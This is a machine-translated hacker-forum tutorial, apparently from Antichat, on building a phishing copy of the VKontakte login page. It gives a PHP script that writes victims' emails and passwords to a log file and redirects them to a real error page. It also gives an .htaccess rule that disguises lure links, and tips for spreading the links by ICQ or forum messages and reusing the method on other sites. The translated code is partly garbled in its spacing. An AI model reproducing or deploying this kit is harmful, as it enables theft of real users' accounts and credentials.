This page has been robot translated, sorry for typos if any. Original content here.

Фейк на швидку руку

[INtrO]

Робити було нечаго, справа була ввечері .... Власне на першу мою статтю (першу на антічате), потягнув мене той факт, що в розділі купи / продай / обменя / кинь по крупному є тема, в якій один Хеккер продовать фейки аж по 10 ВМЗ, та й часто просять створити той чи інший фейк ...
Я ж розповім однією статтею якомога забацать універсальний фейк майже під усе, що угондо! Покажу на прикладі фейк вконтакте.

[SeaRchINg]

І так, 1 що нам потрібно, так це вибрати жертворесурс і зібрати всю потрібну нам інфу, а нам потрібна толька копія деяких страніц.Ідем на vkontakte.ru через Operu (!). Жмякайте кнопочку вхід, потрапляємо на логін.пхп, її і візьмемо за індекс нашого фейк. Тиснемо в опері: Фаил -> Зберегти як -> У відкрилися діалозі під назвою вибираємо (за замовчуванням там стоїть Веб Архів ....) "HTML Фаил з зображеннями", і обезательно графу Ім'я файлу пишемо index (або login.htm - в залежності від сторінки)


Далі вводимо туди нереальні дані і потрапляємо на сторінку, на якій написано
Такий поштову адресу не зареєстрований, або пароль невірний.
Зберігаємо її точно так же, т ільки замість index пишемо bad.
Далі вбиваємо в Google.ru фразу Vkontakte.ru, тиснемо Додаткові результати з vkontakte.ru »і іщім щось пов'язане з ерором контакту ... На вторйо сторінки я знайшов VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- запам'ятовуємо, нам знадобитися ця посилання
Усе, все що нам треба для фейк від ресурсу, у нас вже є.

[CoDiNg]

Такс, тепер іследуем форму логіна. Відкриваємо наш index.html і шукаємо форму входу.
 <Form method = "post" name = "login" id = "login" action = "login.php">

  <Input type = "hidden" name = "success_url" id = "success_url" value = "">
  <Input type = "hidden" name = "fail_url" id = "fail_url" value = "">

  <Input type = "hidden" name = "try_to_login" id = "try_to_login" value = "1">
  <Table align = "center" cellpadding = 0 cellspacing = 7 border = 0 width = "40%">

  <Tr>
  <Td width = "100px">
  <Span class = "grey"> Email: </ span>
  </ Td>
  <Td>

  <Input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />

  <Td>
  </ Tr>
  <Tr>
  <Td>
  <Span class = "grey"> Пароль: </ span>

  </ Td>
  <Td>
  <Input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />

  </ Td>
  </ Tr>
 
  <Tr>
  <Td>
  & Nbsp;
  </ Td>
  <Td>

  <Input style = "margin-top: 1px; vertical-align: middle;"  type = "checkbox" name = "expire" id = "expire" value = "1" /> <small> Чужий комп'ютер </ small>

  </ Td>
  </ Tr>
  <Tr>
  <Td>
  & Nbsp;
  </ Td>
  <Td>
Звідси запам'ятовуємо 3 речі:
<Form method = "post" name = "login" id = "login" action = "login.php">
<Input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />
Саме в цих 3 речах заключається перша частина унікальності, на будь-який соціалці або емайл або ще де небудь, скрізь форма входу (поля), будуть в такому види (ну тільки назва полів будить відрізнятися), наприклад у однокласників це
<Input id = "field_password" value = "" style = "width: 170px;" type = "password" size = "20" name = "st.password">
Тобто просто отличаеться назву полів, елементами дизайну-но функція у всіх одна і таж.
Тепер ми створюємо пхп файл, і називаємо його наприклад login.php, його вміст:

PHP Код:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt", "at");
flock ($ f, 2);
if (preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i ", $ _POST [ 'email']) &&! empty ($ _POST [ 'password'])) {
fputs ($ f, $ _POST [ 'email']. ";". $ _POST [ 'password']. "\ n");
header ( "Location: http: //");
} Else {
header ( "Location: http: //");
}
flock ($ f, 3);
fclose ($ f);
?>
Власне дивимося на скрипт, пару строчег, але це цілком нормальний фейк, його функціонал:
Збереження переданих змінних, їх перевірка, редирект в залежності від перевірки.

І так, тепер повертаємося до тих 3 рядках:
<form method = "post" name = "login" id = "login" action = "login.php">
тут у нас все в порядки, ім'я нашого скрипта совподает з ім'ям їхнього, нобивает що і не співпаде, тоді замінюємо його або ж переіміновиваем наш.
<Input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<Input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />
Звідси нам потрібно name = "email" і name = "pass"
Вставляємо їх у наш скрипт в потрібне місце
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt", "at");
flock ($ f, 2);
if (preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i ", $ _POST [ 'email']) &&! empty ($ _POST [ 'pass'])) {
fputs ($ f, $ _POST [ 'email']. ";". $ _POST [ 'pass']. "\ n");
header ( "Location: http: //");
} Else {
header ( "Location: http: //");
}
flock ($ f, 3);
fclose ($ f);
?>
Хто не помітив, це $ _POST [ 'email'] і $ _POST [ 'pass']

Далі дивимося скрип, тут стаіт функція IF ELSE, і прегматч, тобто якщо поле емайл відповідає емайл (ника@мыло.ру, а не як водять ивпмдвгк), і поле пароль не порожнє, то виполняеться перший редирект, якщо ж Емаіл не відповідає або поле пас пусте, то на другий редирект. З цього випливає, що якщо Челл ввів мило і щось схоже на пас, то кидаємо його на сторінку з ерором http://vkontakte.ru/blank.php?code=10, а якщо ввів херню (ось тут нам і знадобилася копія сторінки bad.html? коли ми вводили невірні дані), то кидаємо його назад, тобто вписуємо bad.htm.

PHP Код:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt", "at");
flock ($ f, 2);
if (preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i ", $ _POST [ 'email']) &&! empty ($ _POST [ 'pass'])) {
fputs ($ f, $ _POST [ 'email']. ";". $ _POST [ 'pass']. "\ n");
header ( "Location: http://vkontakte.ru/blank.php?code=10");
} Else {
header ( "Location: bad.htm");
}
flock ($ f, 3);
fclose ($ f);
?>
Сохраняем.Заліваем всю лабуду на сервер (login.php, index.htm + папка з файлами, bad.htm + папка з файлами), створюємо файіл log.txt (раджу своє унікальне ім'я придумати. Не забудьте в скрипті змінити), ставимо на нього chmod777.

3) невеликий апдейт ...

Цей апдейт підійде дуже дл СІ, в корені на фтп створюємо фаил .htaccess з наступним змістом:

RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -f
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

УВАГА!!!
! index \ .htm -на цей фаил ссилаеться редирект, якщо ж у вас фейк допустимо login.html. то відповідно вам потрібно перейменувати індекс в логін.

Такс, даний фаил нам дає посилання більш якісно газліва, а саме:
вашфейк.ру / будь-який текст, тобішь знаючи посилання структуру согдаваемого фейк, наприклад контакту, ми можемо зробити так:


вашфейк.ру / photos.php? act = show & id = 15884695_588954334 & uid = 359648756 & self = 6
і впарити це по асьці))) погодьтеся. менш помітний тепер фейк))

От і все

[THe eND] Власне що унікального, а то що ви можете зайти на на однокласників, так само зберегти сторінку, вписати змінні, замінити урли (ось відразу даю http://odnoklassniki.ru/dk?st.cmd=error) і все, обсолютно так само зайти на майіл.ру, зберегти змінні і замінити і все))) Єдине, що вам може знадобитися-це креативність, добустім зберігати не головну сторінку, а сторінку входа.Ви так само можете зробити будь-який форум, якщо ви допустимо хочете отримати аккаунт ( відправляєте в пм
<a href="фейк"> посилання на тему </a>
, А в фейк вказуєте цю тему для перенаправлення.